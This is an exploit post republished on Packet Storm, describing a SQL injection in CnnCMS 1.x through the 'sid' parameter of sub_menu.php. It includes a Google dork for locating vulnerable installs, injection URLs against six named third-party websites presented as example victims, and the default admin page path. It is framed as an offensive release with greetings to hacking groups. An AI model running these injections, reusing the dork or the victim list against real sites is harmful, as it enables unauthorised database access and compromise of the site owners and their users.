CnnCMS version 1.x suffers from a remote SQL injection vulnerability.
d436ff041fb8f812be29f707d33b193967410e1cfb4f891ca66db3f737c8e6dd=========================================================================
CnnCMS 1.x SQL Injection Vulnerability
=========================================================================
:-------------------------------------------------------------------------------------------------------------------------::
# Exploit Title : CnnCMS 1.x SQL Injection Vulnerability:
# Date : March 3rd 2012:
# Author : X-Cisadane:
# Software Link : http://www.thinknolimits.com/:
# Version : 1.x:
# Category : Web Applications :
# Vulnerability : SQL Injection:
# Tested On : Google Chrome 14.0.835 (Windows):
# Dorks : inurl:sub_menu.php?sid=:
# Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari:-------------------------------------------------------------------------------------------------------------------------:
SQL Injection Vulnerability:
- Open Victim Website : http://<site>/<CnnCMS Path>/sub_menu.php?sid=-[SQL]
Example:
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1
Admin Page (Default) : http://<site>/<CnnCMS Path>/admin/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed